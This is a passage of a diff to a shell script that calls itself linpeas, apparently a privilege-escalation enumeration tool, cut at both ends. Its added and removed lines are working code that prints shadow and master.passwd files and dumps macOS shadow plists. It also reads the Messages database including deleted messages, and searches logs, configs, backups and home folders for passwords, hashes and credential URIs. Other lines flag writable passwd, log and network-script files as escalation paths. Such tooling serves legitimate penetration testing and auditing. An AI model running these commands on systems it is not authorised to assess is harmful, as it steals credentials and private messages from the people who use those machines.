+if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+
+##-- IF) Writable in passwd file
+print_list "Writable passwd file? ................ "
+if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+else echo_no
+fi
+
+##-- IF) Credentials in fstab
+print_list "Credentials in fstab/mtab? ........... "
+if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+
+##-- IF) Read shadow files
+print_list "Can I read shadow files? ............. 
"
+if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+
+print_list "Can I read shadow plists? ............ "
+possible_check=""
+(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
+
+print_list "Can I write shadow plists? ........... "
+possible_check=""
+(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
+
+##-- IF) Read opasswd file
+print_list "Can I read opasswd file? ............. "
+if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo ""
+else echo_no
+fi
+
+##-- IF) network-scripts
+print_list "Can I write in network-scripts? ...... "
+if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+else echo_no
+fi
+
+##-- IF) Read root dir
+print_list "Can I read root folder? .............. 
"
+(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no
+echo ""
+
+##-- IF) Root files in home dirs
+print_2title "Searching root files in home dirs (limit 30)"
+(find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found
+echo ""
+
+##-- IF) Others files in my dirs
+if ! [ "$IAMROOT" ]; then
+ print_2title "Searching folders owned by me containing others files on it (limit 100)"
+ (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g"
+ echo ""
+fi
+
+##-- IF) Readable files belonging to root and not world readable
+if ! [ "$IAMROOT" ]; then
+ print_2title "Readable files belonging to root and readable by me but not world readable"
+ (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found
+ echo ""
+fi
+
+##-- IF) Modified interesting files into specific folders in the last 5mins
+print_2title "Modified interesting files in the last 5mins (limit 100)"
+find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! 
-path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED},"
+echo ""
+
+##-- IF) Writable log files
+print_2title "Writable log files (logrotten) (limit 100)"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation"
+logrotate --version 2>/dev/null || echo_not_found "logrotate"
+lastWlogFolder="ImPOsSiBleeElastWlogFolder"
+logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100)
+printf "%s\n" "$logfind" | while read log; do
+ if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found
+ if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC;
+ elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case
+ elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log";
+ elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! 
"$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g";
+ fi
+ fi
+done
+
+echo ""
+
+##-- IF) Files inside my home
+print_2title "Files inside $HOME (limit 20)"
+(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found
+echo ""
+
+##-- IF) Files inside /home
+print_2title "Files inside others home (limit 20)"
+(find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found
+echo ""
+
+##-- IF) Mail applications
+print_2title "Searching installed mail applications"
+ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps"
+echo ""
+
+##-- IF) Mails
+print_2title "Mails (limit 50)"
+(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found
+echo ""
+
+##-- IF) Backup folders
+print_2title "Backup folders"
+printf "%s\n" "$backup_folders" | while read b ; do
+ ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g";
+ ls -l "$b" 2>/dev/null && echo ""
+done
+echo ""
+
+##-- IF) Backup files
+print_2title "Backup files (limited 100)"
+backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null)
+printf "%s\n" "$backs" | head -n 100 | while read b ; do
+ if [ -r "$b" ]; then
+ ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g";
+ fi;
+done
+echo ""
+
+##-- IF) DB files
+if [ "$MACPEAS" ]; then
+ print_2title "Reading messages database"
+ sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null
+ sqlite3 
$HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null
+ sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null
+
+fi
+print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)"
+FILECMD="$(command -v file 2>/dev/null)"
+if [ "$PSTORAGE_DATABASE" ]; then
+ printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
+ if [ "$FILECMD" ]; then
+ echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
+ else
+ echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
+ fi
+ done
+ SQLITEPYTHON=""
+ echo ""
+ printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
+ if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd
+ printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC
+ if [ "$(command -v sqlite3 2>/dev/null)" ]; then
+ tables=$(sqlite3 $f ".tables" 2>/dev/null)
+ #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
+ elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then
+ SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null)
+ tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null)
+ #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
+ else
+ tables=""
+ fi
+ if [ "$tables" ]; then
+ printf "%s\n" "$tables" | while read t; do
+ columns=""
+ # Search for credentials inside the table using sqlite3
+ if [ -z "$SQLITEPYTHON" ]; then
+ columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE")
+ # Search for credentials inside the table using python
+ else
+ columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM 
sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null)
+ fi
+ #Check found columns for interesting fields
+ INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt")
+ if [ "$INTCOLUMN" ]; then
+ printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g"
+ printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g"
+ (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head
+ fi
+ done
+ echo ""
+ fi
+ fi
+ done
+fi
+echo ""
+
+if [ "$MACPEAS" ]; then
+ print_2title "Downloaded Files"
+ sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|"
+fi
+
+##-- IF) Web files
+print_2title "Web files?(output limit)"
+ls -alhR /var/www/ 2>/dev/null | head
+ls -alhR /srv/www/htdocs/ 2>/dev/null | head
+ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head
+ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head
+echo ""
+
+##-- IF) All hidden files
+print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)"
+find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! 
-path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70
+echo ""
+
+##-- IF) Readable files in /tmp, /var/tmp, bachups
+print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)"
+filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70)
+printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done
+echo ""
+
+##-- IF) Interesting writable files by ownership or all
+if ! [ "$IAMROOT" ]; then
+ print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)"
+ print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files"
+ #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
+ obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
+ printf "%s\n" "$obmowbe" | while read entry; do
+ if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
+ elif echo "$entry" | grep -qE "$writeVB"; then
+ echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
+ else
+ echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
+ fi
+ done
+ echo ""
+fi
+
+##-- IF) Interesting writable files by group
+if ! 
[ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in $(groups); do + printf " Group $GREEN$g:\n$NC"; + iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$iwfbg" | while read entry; do if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then + elif echo "$entry" | grep -Eq "$writeVB"; then echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," else echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," fi done - echo "" - fi - - ##-- IF) Interesting writable files by group - if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - for g in $(groups); do - printf " Group $GREEN$g:\n$NC"; - iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! 
-path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$iwfbg" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -Eq "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - done - echo "" - fi - - ##-- IF) Passwords in config PHP files - print_2title "Searching passwords in config PHP files" - printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done + done echo "" - - ##-- IF) TTY passwords - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" - echo "" - - ##-- IF) IPs inside logs - print_2title "Finding IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 - echo "" - - ##-- IF) Passwords inside logs - print_2title "Finding passwords inside logs 
(limit 70)"
- (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED},"
- echo ""
-
- ##-- IF) Emails inside logs
- print_2title "Finding emails inside logs (limit 70)"
- (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g"
- echo ""
-
- ##-- IF) Passwords files in home
- print_2title "Finding *password* or *credential* files in home (limit 70)"
- (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found
- echo ""
-
- if ! 
[ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
- ##-- IF) Find possible files with passwords
- print_2title "Finding passwords inside key folders (limit 70) - only PHP files"
- intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null)
- printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
- echo ""
-
- print_2title "Finding passwords inside key folders (limit 70) - no PHP files"
- printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
- echo ""
-
- ##-- IF) Find possible files with passwords
- print_2title "Finding possible password variables inside key folders (limit 140)"
- timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g"
- 
timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g"
- echo ""
-
- ##-- IF) Find possible conf files with passwords
- print_2title "Finding possible password in config files"
- ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null)
- printf "%s\n" "$ppicf" | while read f; do
- if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then
- echo "$ITALIC $f$NC"
- grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g"
- fi
- done
- echo ""
-
- ##-- IF) Find possible files with usernames
- print_2title "Finding 'username' string inside key folders (limit 70)"
- timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g"
- timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v 
"#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g"
- echo ""
-
- ##-- IF) Specific hashes inside files
- print_2title "Searching specific hashes inside files - less false positives (limit 70)"
- regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*'
- regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}'
- regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}'
- regexwp='\$P\$[a-zA-Z0-9_/\.]{31}'
- regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}'
- regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
- regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
- regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}'
- regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}'
- timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED},"
- echo ""
- fi
-
- if ! [ "$FAST" ] && ! 
[ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
- ##-- IF) Specific hashes inside files
- print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)"
- regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)'
- regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)'
- regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)'
- regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)'
- timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m,"
- echo ""
- fi
-
- if ! [ "$SUPERFAST" ] && ! 
[ "$FAST" ]; then - ##-- IF) Find URIs with user:password@hoststrings - print_2title "Finding URIs with user:password@host inside key folders" - timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - echo "" - fi fi + +##-- IF) Passwords in config PHP files +print_2title "Searching passwords in config PHP files" +printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done +echo "" + +##-- IF) TTY passwords +print_2title "Checking for TTY (sudo/su) 
passwords in audit logs"
